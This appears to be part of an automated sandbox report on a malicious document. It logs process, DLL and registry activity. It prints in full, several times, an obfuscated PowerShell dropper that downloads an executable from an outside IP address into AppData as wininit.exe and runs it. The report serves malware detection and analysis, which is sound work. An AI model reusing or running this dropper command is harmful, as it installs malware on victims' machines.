                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64win.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wow64cpu.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: mozglue.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: msvcp140.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vcruntime140.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: ucrtbase.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vaultcli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: netapi32.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wkscli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: samcli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: samlib.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\verclsid.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\verclsid.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\verclsid.exeSection loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: PO-000041492.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\PO-000041492.docx.doc
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: PO-000041492.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                Source: 4.466364_2401 PACKING LIST.xlsx.0.drInitial sample: OLE zip file path = xl/media/image2.png
                Source: 4.466364_2401 PACKING LIST.xlsx.0.drInitial sample: OLE zip file path = xl/media/image1.png
                Source: 4.466364_2401 PACKING LIST.xlsx.0.drInitial sample: OLE zip file path = xl/calcChain.xml
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: p7C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.pdb source: powershell.exe, 0000000A.00000002.415492102.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.415492102.00000000020CA000.00000004.00000800.00020000.00000000.sdmp
                Source: PO-000041492.docx.docInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: Yara matchFile source: 16.2.wininit.exe.326edc0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.wininit.exe.326edc0.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.wininit.exe.3288de0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.wininit.exe.3288de0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00402AC0 push eax; ret 18_2_00402AD4
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00402AC0 push eax; ret 18_2_00402AFC
                Source: caspol[1].exe.10.drStatic PE information: section name: .text entropy: 7.9227520273220895
                Source: wininit.exe.10.drStatic PE information: section name: .text entropy: 7.9227520273220895
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
